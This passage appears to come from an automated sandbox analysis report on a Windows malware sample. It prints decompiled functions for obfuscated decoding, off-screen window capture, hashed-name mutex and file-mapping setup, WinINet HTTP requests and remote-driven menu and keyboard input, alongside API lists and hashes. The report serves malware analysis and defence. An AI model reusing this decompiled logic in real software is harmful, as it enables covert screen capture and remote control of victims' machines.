        					if(_v8 > (_v28 ^ 0x2a823c2b) - (_v16 ^ 0x2a823c2b)) {
        						break;
        					}
        					_v12 = _v8 - 0x138527e2 ^ 0x2a823c2b;
        					_v12 = E0245A912( &_v12);
        					 *((intOrPtr*)(_t125 + _v8 * 4 - 0x420)) = _v12;
        					_t64 = (_v16 ^ 0x2a823c2b) + _v8 + 0x138527e2;
        				}
        				_v12 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
        				_v28 = 0xc6f8e536;
        				while(_v20 != (_v24 ^ 0x2a823c2b) + 0x138527e2) {
        					_v8 = _v12 >> (_v36 ^ 0x2a823c2b) + 0x138527e2;
        					_t83 = _a4;
        					_a7 =  *_t83;
        					_a4 = _a7 & 0x000000ff ^ _v12;
        					_v12 =  *(_t125 + ((_v28 ^ 0x2a823c2b) + 0x138527e2 & _a4) * 4 - 0x420) ^ _v8;
        					_a4 = _t83 + (_v16 ^ 0x2a823c2b) + 0x138527e2;
        					_v20 = 0xec7ad81e - (_v16 ^ 0x2a823c2b) + _v20;
        				}
        				return (_v32 ^ 0x2a823c2b) + 0x138527e2 ^ _v12;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004122B7() {
        				signed int _t23;
        				signed int _t59;
        				signed int* _t63;
        				signed int _t64;
        
        				_t23 =  *0x41fe6c;
        				if(_t23 >= 0x270) {
        					_t64 = 0;
        					do {
        						_t59 = _t64;
        						_t64 = _t64 + 1;
        						0x41f4a0[_t59] = (( *(0x41f4a4 + _t59 * 4) ^ 0x41f4a0[_t59]) & 0x7fffffff ^ 0x41f4a0[_t59]) >> 0x00000001 ^  *(0x41e380 + ((( *(0x41f4a4 + _t59 * 4) ^ 0x41f4a0[_t59]) & 0x7fffffff ^ 0x41f4a0[_t59]) & 0x00000001) * 4) ^  *(0x41fad4 + _t59 * 4);
        					} while (_t64 < 0xe3);
        					if(_t64 < 0x26f) {
        						_t63 =  &(0x41f4a0[_t64]);
        						do {
        							 *_t63 =  *(0x41e380 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
        							_t63 =  &(_t63[1]);
        						} while (_t63 < 0x41fe5c);
        					}
        					 *0x41fe5c = (( *0x41f4a0 ^  *0x41fe5c) & 0x7fffffff ^  *0x41fe5c) >> 0x00000001 ^  *(0x41e380 + ((( *0x41f4a0 ^  *0x41fe5c) & 0x7fffffff ^  *0x41fe5c) & 0x00000001) * 4) ^  *0x41fad0;
        					_t23 = 0;
        				}
        				 *0x41fe6c = _t23 + 1;
        				return (0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0245A912(intOrPtr* __ebx) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				intOrPtr* _t27;
        				signed int _t37;
        				signed int _t51;
        				signed int _t57;
        				signed int _t60;
        
        				_t27 = __ebx;
        				_v20 = 0xc6f8e435;
        				_v8 = 0xc6f8e434;
        				_v12 =  *__ebx;
        				_v16 = 0xc6f8e40d;
        				_v24 = 0xf0b16715;
        				_t51 = ((_v8 ^ 0x2a823c2b) + 0x138527e2) * ((_v20 ^ 0x2a823c2b) + 0x138527e2);
        				while(_t51 <= (_v16 ^ 0x2a823c2b) - (_v8 ^ 0x2a823c2b)) {
        					_t57 = _v12;
        					_t37 = _v8;
        					if(((_v8 ^ 0x2a823c2b) + 0x138527e2 & (_v12 ^ 0x2a823c2b) + 0x138527e2) == 0) {
        						_t60 = (_t57 ^ 0x2a823c2b) + 0x138527e2 >> (_t37 ^ 0x2a823c2b) + 0x138527e2;
        					} else {
        						_t60 = (_t57 ^ 0x2a823c2b) + 0x138527e2 >> (_t37 ^ 0x2a823c2b) + 0x138527e2 ^ (_v24 ^ 0x2a823c2b) + 0x138527e2;
        					}
        					_v12 = _t60;
        					_t51 = _t51 + (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				}
        				 *_t27 = _v12;
        				return _v12;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E004176A1(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
        				char _v9;
        				signed int _v10;
        				int _v16;
        				int _v20;
        				int _v24;
        				int _v28;
        				int _v32;
        				struct tagRECT _v48;
        				struct tagRECT _v64;
        				void* _v68;
        				signed int _v72;
        				int _v76;
        				intOrPtr _v80;
        				intOrPtr _v84;
        				int _v88;
        				int _v92;
        				struct HDC__* _v96;
        				struct HWND__* _v100;
        				void _v104;
        				intOrPtr _v140;
        				intOrPtr _v156;
        				struct tagWINDOWINFO _v164;
        				signed int _t128;
        				signed int _t135;
        				void* _t140;
        				void* _t146;
        				signed int _t164;
        				intOrPtr _t191;
        				long _t192;
        				intOrPtr _t195;
        				long _t196;
        				long _t210;
        				long _t211;
        				long _t212;
        				long _t213;
        				signed int _t214;
        				signed int _t215;
        				RECT* _t216;
        				struct HDC__* _t217;
        				struct HDC__* _t221;
        
        				_t214 = __edx;
        				_t216 = __eax;
        				_t128 = E00417DB4(_a8) & 0x0000ffff;
        				_v16 = _t128;
        				if((_t128 & 0x00000001) == 0) {
        					if(_t128 == 0) {
        						_v16 = 2;
        						_t128 = _v16;
        					}
        					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
        						_v16 = _t128 & 0x0000fffd | 0x00000008;
        					}
        					_v24 = 0;
        					_v20 = 0;
        					_v28 = 0;
        					_v32 = 0;
        					_v164.cbSize = 0x3c;
        					if(GetWindowInfo(_a8,  &_v164) != 0) {
        						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
        						_v10 = _t215;
        						if(_t215 != 0) {
        							_t212 = _t216->top;
        							_t195 = _v156;
        							if(_t195 < _t212) {
        								_v20 = _t195 - _t212;
        							}
        							_t213 = _t216->left;
        							_t196 = _v164.rcWindow.left;
        							if(_t196 < _t213) {
        								_v24 = _t196 - _t213;
        							}
        						}
        						_t135 = _v16 & 0x00000002;
        						_v72 = _t135;
        						if(_t135 == 0) {
        							_a15 = _t215;
        						} else {
        							if((_v164.dwStyle & 0x20000000) == 0) {
        								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
        								if(_a15 != 0) {
        									_t210 = _t216->top;
        									_t191 = _v140;
        									if(_t191 < _t210) {
        										_v32 = _t191 - _t210;
        									}
        									_t211 = _t216->left;
        									_t192 = _v164.rcClient.left;
        									if(_t192 < _t211) {
        										_v28 = _t192 - _t211;
        									}
        								}
        							} else {
        								_a15 = 0;
        							}
        						}
        						if(_v10 != 0 || _a15 != 0) {
        							_t217 = GetDC(0);
        							if(_t217 == 0) {
        								goto L8;
        							}
        							_t221 = CreateCompatibleDC(_t217);
        							ReleaseDC(0, _t217);
        							if(_t221 == 0) {
        								goto L8;
        							}
        							_t218 = _a4;
        							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
        							_v68 = _t140;
        							if(_t140 != 0) {
        								_v9 = 1;
        								if(_v72 == 0) {
        									if((_v16 & 0x00000004) == 0) {
        										if((_v16 & 0x00000008) == 0) {
        											L56:
        											SelectObject(_t221, _v68);
        											DeleteDC(_t221);
        											return _v9;
        										}
        										if(_v24 != 0 || _v20 != 0) {
        											SetViewportOrgEx(_t221, _v24, _v20, 0);
        										}
        										_t146 = E004175BF(_t218,  &_v64, 0);
        										__imp__PrintWindow(_a8, _t221, 0);
        										if(_t146 != 0) {
        											L55:
        											E004175BF(_t218,  &_v64, 1);
        										} else {
        											_v9 = 0;
        										}
        										goto L56;
        									}
        									if(_v24 != 0 || _v20 != 0) {
        										SetViewportOrgEx(_t221, _v24, _v20, 0);
        									}
        									E004175BF(_t218,  &_v64, 0);
        									DefWindowProcW(_a8, 0x317, _t221, 0xe);
        									goto L55;
        								}
        								_v100 = _a8;
        								_v96 = _t221;
        								_v84 = _v48.right - _v48.left;
        								_v76 = 1;
        								_v80 = _v48.bottom - _v48.top;
        								_v92 = 0;
        								_v88 = 0;
        								TlsSetValue( *0x41fe7c,  &_v104);
        								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
        									_v16 = SaveDC(_t221);
        									if(_v24 != 0 || _v20 != 0) {
        										SetViewportOrgEx(_t221, _v24, _v20, 0);
        									}
        									E004175BF(_a4,  &_v64, 0);
        									_v104 = 0;
        									SendMessageW(_a8, 0x85, 1, 0);
        									if(_v104 == 0) {
        										DefWindowProcW(_a8, 0x317, _t221, 2);
        									}
        									E004175BF(_a4,  &_v64, 1);
        									RestoreDC(_t221, _v16);
        								}
        								if(_a15 != 1) {
        									L49:
        									TlsSetValue( *0x41fe7c, 0);
        									goto L56;
        								} else {
        									if(_v28 != 0) {
        										L41:
        										_a15 = 1;
        										L42:
        										_v16 = SaveDC(_t221);
        										if(_a15 != 0) {
        											SetViewportOrgEx(_t221, _v28, _v32, 0);
        										}
        										E004175BF(_a4,  &_v48, 0);
        										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
        										asm("sbb eax, eax");
        										_v76 =  ~_t164 + 1;
        										RestoreDC(_t221, _v16);
        										if(_a15 != 0) {
        											SetViewportOrgEx(_t221, _v28, _v32, 0);
        										}
        										_v104 = 0;
        										SendMessageW(_a8, 0xf, 0, 0);
        										if(_v104 == 0) {
        											DefWindowProcW(_a8, 0x317, _t221, 4);
        										}
        										E004175BF(_a4,  &_v48, 1);
        										goto L49;
        									}
        									_a15 = 0;
        									if(_v32 == 0) {
        										goto L42;
        									}
        									goto L41;
        								}
        							}
        							DeleteDC(_t221);
        							goto L8;
        						} else {
        							goto L1;
        						}
        					}
        					L8:
        					return 0;
        				}
        				L1:
        				return 1;
        			}

        APIs
          • Part of subcall function 00417DB4: GetClassNameW.USER32 ref: 00417DCF
        • GetWindowInfo.USER32 ref: 0041770D
        • SelectObject.GDI32(00000000,?), ref: 004179DC
        • DeleteDC.GDI32(00000000), ref: 004179E3
        • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00417A0B
        • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00417A21
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
        • String ID: <
        • API String ID: 3458064076-4251816714
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00417E1B(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
        				char _v9;
        				struct HDC__* _v16;
        				char _v20;
        				short _v128;
        				void* _v138;
        				char _v616;
        				char _v994;
        				char _v1360;
        				void* _t60;
        				long _t62;
        				void* _t66;
        				void* _t71;
        				void* _t75;
        				void* _t79;
        				void* _t80;
        				struct HDC__* _t82;
        				int _t85;
        				void* _t87;
        				signed char _t90;
        				void* _t92;
        				void* _t107;
        				struct HDC__* _t108;
        				void* _t109;
        				void* _t111;
        				void* _t112;
        				void* _t120;
        				void** _t124;
        
        				_t124 = __esi;
        				_t120 = __edx;
        				E004111B9(_t60, __esi, 0, 0x18c);
        				_t62 = TlsAlloc();
        				__esi[1] = _t62;
        				if(_t62 != 0xffffffff) {
        					E004069C2(0x80b7b0e6,  &_v128, 0);
        					_t66 = RegisterWindowMessageW( &_v128);
        					__esi[2] = _t66;
        					__eflags = _t66;
        					if(_t66 == 0) {
        						goto L1;
        					}
        					E004069C2(0xb2d480a4,  &_v128, 1);
        					_t71 = CreateEventW(0x41e5c8, 1, 0,  &_v128);
        					__esi[3] = _t71;
        					__eflags = _t71;
        					if(_t71 == 0) {
        						goto L1;
        					}
        					E004069C2(0x6d70cb65,  &_v128, 1);
        					_t75 = CreateMutexW(0x41e5c8, 0,  &_v128);
        					__esi[5] = _t75;
        					__eflags = _t75;
        					if(_t75 == 0) {
        						goto L1;
        					}
        					E004069C2(0xdd4e2c1d,  &_v128, 1);
        					_t79 = CreateFileMappingW(0, 0x41e5c8, 4, 0, 0x3d09128,  &_v128);
        					 *__esi = _t79;
        					__eflags = _t79;
        					if(_t79 == 0) {
        						goto L1;
        					}
        					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
        					__eflags = _t80;
        					if(_t80 == 0) {
        						goto L1;
        					}
        					__esi[4] = _t80;
        					__esi[6] = _t80 + 0x128;
        					_v9 = 0;
        					_t82 = GetDC(0);
        					_v16 = _t82;
        					__eflags = _t82;
        					if(_t82 == 0) {
        						L22:
        						return _v9;
        					}
        					__esi[9] = 0;
        					__esi[0xa] = 0;
        					__esi[0xb] = GetDeviceCaps(_t82, 8);
        					_t85 = GetDeviceCaps(_v16, 0xa);
        					_t118 = __esi[0xb];
        					__esi[0xc] = _t85;
        					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
        					if(__eflags == 0) {
        						_t87 = 0;
        						__eflags = 0;
        					} else {
        						_t24 =  &(_t124[8]); // 0x41fe98
        						_t87 = E004174C5(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
        					}
        					_t124[7] = _t87;
        					ReleaseDC(0, _v16);
        					__eflags = _t124[7];
        					if(_t124[7] != 0) {
        						_t119 = _v20;
        						_t90 =  *(_v20 + 0xe) >> 3;
        						_t124[0xe] = _t90;
        						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
        						_t124[0xd] = _t92;
        						__eflags = _t92 & 0x00000003;
        						if((_t92 & 0x00000003) != 0) {
        							_t92 = (_t92 & 0xfffffffc) + 4;
        							__eflags = _t92;
        						}
        						_t124[0xd] = _t92;
        						E00411106(_t119);
        						__eflags = _a4 - 1;
        						_v9 = 1;
        						if(_a4 != 1) {
        							goto L22;
        						}
        						_v9 = 0;
        						E00406C9C( &_v1360);
        						E00406CC9(_t119,  &_v616);
        						_t43 =  &(_t124[0xf]); // 0x41feb4
        						E00411142(_t43, 0x41e808, 0x10);
        						_t124[0x13] = _v138;
        						_t47 =  &(_t124[0x14]); // 0x41fec8
        						E00411142(_t47,  &_v994, 0x102);
        						E004069C2(0xff8d98d6,  &_v128, 1);
        						_t107 = CreateMutexW(0x41e5c8, 0,  &_v128);
        						_t124[0x58] = _t107;
        						__eflags = _t107;
        						if(_t107 == 0) {
        							goto L1;
        						}
        						_t108 = GetDC(0);
        						_a4 = _t108;
        						__eflags = _t108;
        						if(_t108 != 0) {
        							_t109 = CreateCompatibleDC(_t108);
        							_t124[0x55] = _t109;
        							__eflags = _t109;
        							if(_t109 != 0) {
        								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
        								_t124[0x57] = _t111;
        								__eflags = _t111;
        								if(_t111 != 0) {
        									_t112 = SelectObject(_t124[0x55], _t111);
        									_t124[0x56] = _t112;
        									__eflags = _t112;
        									if(_t112 != 0) {
        										_v9 = 1;
        									}
        								}
        							}
        							ReleaseDC(0, _a4);
        						}
        					}
        					goto L22;
        				}
        				L1:
        				return 0;
        			}

        APIs
        • TlsAlloc.KERNEL32(0041FE78,00000000,0000018C,00000000,00000000), ref: 00417E34
        • RegisterWindowMessageW.USER32(?,80B7B0E6,?,00000000), ref: 00417E5C
        • CreateEventW.KERNEL32(0041E5C8,00000001,00000000,?,B2D480A4,?,00000001), ref: 00417E86
        • CreateMutexW.KERNEL32(0041E5C8,00000000,?,6D70CB65,?,00000001), ref: 00417EA9
        • CreateFileMappingW.KERNEL32(00000000,0041E5C8,00000004,00000000,03D09128,?,DD4E2C1D,?,00000001), ref: 00417ED4
        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00417EEA
        • GetDC.USER32(00000000), ref: 00417F07
        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00417F27
        • GetDeviceCaps.GDI32(?,0000000A), ref: 00417F31
        • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00417F44
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
        • String ID:
        • API String ID: 3765073151-0
        • Opcode ID: d0c63e5da0ec9d915f53d6598e67e0d904e6f111f9e5a40828a4a1bb83f05506
        • Instruction ID: d5f14bbd3a719d56fd1e7f2813bbc9b9d13cc7b4a598a9c4e332fd9a35d95800
        • Opcode Fuzzy Hash: d0c63e5da0ec9d915f53d6598e67e0d904e6f111f9e5a40828a4a1bb83f05506
        • Instruction Fuzzy Hash: 037143B1904748AFE7209FB1CC85EEBBBFCEB08304F10482EF656E6651D67999848F14
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00408F03(intOrPtr* _a4) {
        				char _v532;
        				void* _v536;
        				short _v540;
        				char* _v552;
        				void* _v568;
        				char _v570;
        				char _v572;
        				char _v576;
        				char* _v580;
        				void* _v592;
        				char _v596;
        				char _v600;
        				void* _v620;
        				void* _v624;
        				void* _v628;
        				char* _v632;
        				long _v648;
        				void _v652;
        				intOrPtr _v656;
        				char _v668;
        				intOrPtr _v672;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t53;
        				void* _t56;
        				intOrPtr _t58;
        				void* _t63;
        				void* _t67;
        				void* _t94;
        				void* _t99;
        				char* _t101;
        				intOrPtr* _t109;
        				void* _t113;
        				intOrPtr* _t114;
        				signed int _t120;
        				void* _t122;
        
        				_t122 = (_t120 & 0xfffffff8) - 0x224;
        				_t109 = _a4;
        				if(E0041591E( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
        					L25:
        					return 0;
        				}
        				_t53 = InternetOpenA( *0x41e804, 0, 0, 0, 0);
        				_v536 = _t53;
        				if(_t53 == 0) {
        					L24:
        					E00411106(_v552);
        					E00411106(_v552);
        					goto L25;
        				}
        				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
        				_v592 = _t56;
        				if(_t56 == 0) {
        					L23:
        					InternetCloseHandle(_v568);
        					goto L24;
        				}
        				_t58 =  *_t109;
        				_t101 = "POST";
        				if( *((char*)(_t58 + 0x18)) != 1) {
        					_t101 = "GET";
        				}
        				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
        				_v620 = _t99;
        				if(_t99 == 0) {
        					L22:
        					InternetCloseHandle(_v624);
        					goto L23;
        				} else {
        					E00406CC9(_t101,  &_v576);
        					_t63 = 0xc;
        					E0040C9FD(_t63,  &_v600);
        					_t66 =  *_a4;
        					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
        						_t94 = E00411ECA( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
        						_t122 = _t122 + 0xc;
        						if(_t94 > 0) {
        							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
        							E00411106(_v648);
        						}
        					}
        					_t67 = 0xd;
        					E0040C9FD(_t67,  &_v596);
        					_v628 = E00411C55( &_v572);
        					_t113 = E004110D6(2 + _t69 * 6);
        					if(_t113 == 0) {
        						_t113 = 0;
        					} else {
        						E00415C49(_t113,  &_v572, _v628);
        						_t99 = _v628;
        					}
        					if(_t113 != 0 && E00411ECA( &_v632,  &_v596, _t113) > 0) {
        						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
        						E00411106(_v648);
        					}
        					E00411106(_t113);
        					_t114 = _a4;
        					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
        						L21:
        						InternetCloseHandle(_t99);
        						goto L22;
        					} else {
        						_v648 = 4;
        						_v652 = 0;
        						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
        							goto L21;
        						} else {
        							if(E00413240( &_v668, _t99) != 0) {
        								E00411106(_t80);
        							}
        							E00411106(_v656);
        							E00411106(_v656);
        							 *((intOrPtr*)(_t114 + 8)) = _v668;
        							goto L25;
        						}
        					}
        				}
        			}

        APIs
          • Part of subcall function 0041591E: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041594D
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00408F35
        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00408F56
        • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00408FA5
        • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00408FFC
        • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00409074
        • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00409097
        • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 004090BF
        • InternetCloseHandle.WININET(00000000), ref: 00409104
        • InternetCloseHandle.WININET(?), ref: 0040910E
          • Part of subcall function 00413240: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00413254
          • Part of subcall function 00413240: GetLastError.KERNEL32 ref: 0041325E
          • Part of subcall function 00413240: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0041327E
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        • InternetCloseHandle.WININET(?), ref: 00409118
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
        • String ID: GET$HTTP/1.1$POST
        • API String ID: 1023423486-2753618334
        • Opcode ID: eb45d01fa352cf8880d080afeec35f7770536035ca64cd2c8ff516de2950f96b
        • Instruction ID: 645c89c87df3e2c9fc23b2eab49f43efeb0e96df92ac12a9df6609682218b302
        • Opcode Fuzzy Hash: eb45d01fa352cf8880d080afeec35f7770536035ca64cd2c8ff516de2950f96b
        • Instruction Fuzzy Hash: 7051E072504211BBC710AF61CD49E9FBFA9FF88354F10092AF685A61B2D739CD84CB99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E004181E9(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
        				struct tagRECT _v20;
        				signed int _v24;
        				signed int _v28;
        				signed short _t37;
        				int _t46;
        				BYTE* _t47;
        				signed short _t51;
        				int _t63;
        				int _t64;
        				unsigned int _t65;
        				struct HMENU__* _t70;
        				struct HMENU__* _t74;
        				void* _t78;
        
        				_t65 = __ecx;
        				_t37 = _a8;
        				_t78 = _t37 - 0xfffffffd;
        				if(_t78 == 0) {
        					SetKeyboardState( *0x41fe88);
        					L23:
        					SetEvent( *0x41fe84);
        					return 0;
        				}
        				if(_t78 <= 0 || _t37 > 0xffffffff) {
        					_v20.top = _t37 >> 0x10;
        					_v20.right = _t65 & 0x0000ffff;
        					_v20.left = _t37 & 0x0000ffff;
        					_v20.bottom = _t65 >> 0x10;
        					E004176A1( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x41fe78, _a4, 0);
        					goto L23;
        				} else {
        					_t70 = GetMenu(_a4);
        					if(_t70 == 0) {
        						goto L23;
        					}
        					_v24 = _v24 | 0xffffffff;
        					_t46 = GetMenuItemCount(_t70);
        					_t63 = 0;
        					_v28 = _t46;
        					if(_t46 <= 0) {
        						L8:
        						_t47 =  *0x41fe88;
        						_push(_t47[0x104]);
        						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
        						if(_t64 == 0xffffffff) {
        							goto L23;
        						}
        						_v28 = GetMenuState(_t70, _t64, 0x400);
        						if(_v24 != _t64) {
        							EndMenu();
        						}
        						HiliteMenuItem(_a4, _t70, _t64, 0x480);
        						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
        							if((_v28 & 0x00000010) == 0) {
        								if((_v28 & 0x00000800) == 0) {
        									_t51 = GetMenuItemID(_t70, _t64);
        									if(_t51 == 0xffffffff) {
        										goto L23;
        									}
        									L20:
        									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
        									goto L23;
        								}
        								_t51 = 0;
        								goto L20;
        							}
        							_t74 = GetSubMenu(_t70, _t64);
        							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
        								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
        							}
        						}
        						goto L23;
        					} else {
        						goto L5;
        					}
        					do {
        						L5:
        						if(GetMenuState(_t70, _t63, 0x400) < 0) {
        							HiliteMenuItem(_a4, _t70, _t63, 0x400);
        							_v24 = _t63;
        						}
        						_t63 = _t63 + 1;
        					} while (_t63 < _v28);
        					goto L8;
        				}
        			}

        APIs
        • GetMenu.USER32(?), ref: 00418213
        • GetMenuItemCount.USER32 ref: 00418229
        • GetMenuState.USER32 ref: 00418241
        • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00418251
        • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 00418277
        • GetMenuState.USER32 ref: 0041828B
        • EndMenu.USER32 ref: 0041829B
        • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 004182AB
        • GetSubMenu.USER32 ref: 004182CF
        • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 004182E9
        • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041830A
        • GetMenuItemID.USER32(00000000,00000000), ref: 00418322
        • SendMessageW.USER32(?,00000111,?,00000000), ref: 0041833B
        • SetKeyboardState.USER32 ref: 0041837A
        • SetEvent.KERNEL32 ref: 00418386
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
        • String ID:
        • API String ID: 751066993-0
        • Opcode ID: 019f1a0c9b77ade17ba2df6d538d9c45518256ab5fc9d18cd9e52bfb25cba943
        • Instruction ID: 2d1dbc59354d850a094600d5ead6656028fd57d8eaa7bc4142bdb1ca9abb59f5
        • Opcode Fuzzy Hash: 019f1a0c9b77ade17ba2df6d538d9c45518256ab5fc9d18cd9e52bfb25cba943
        • Instruction Fuzzy Hash: A141C130004308AFD7119F24DD48EAB7AA8EF85B64F08472EFDA5A11B0DB358995DB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E004197C3(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v56;
        				signed int _v72;
        				char _v76;
        				signed int _v80;
        				signed int _v84;
        				signed char _v88;
        				signed int _v92;
        				signed int _v100;
        				intOrPtr _v104;
        				signed int _v108;
        				intOrPtr _v128;
        				void* __esi;
        				signed int _t111;
        				signed int _t113;
        				signed char _t114;
        				signed int _t115;
        				void* _t117;
        				signed char _t121;
        				signed int _t122;
        				signed int _t125;
        				signed int _t128;
        				signed char _t130;
        				signed char _t136;
        				intOrPtr _t149;
        				void* _t165;
        				signed char _t166;
        				void* _t172;
        				intOrPtr _t178;
        				signed int _t184;
        				void* _t186;
        				void* _t188;
        				signed int _t202;
        				signed int _t203;
        
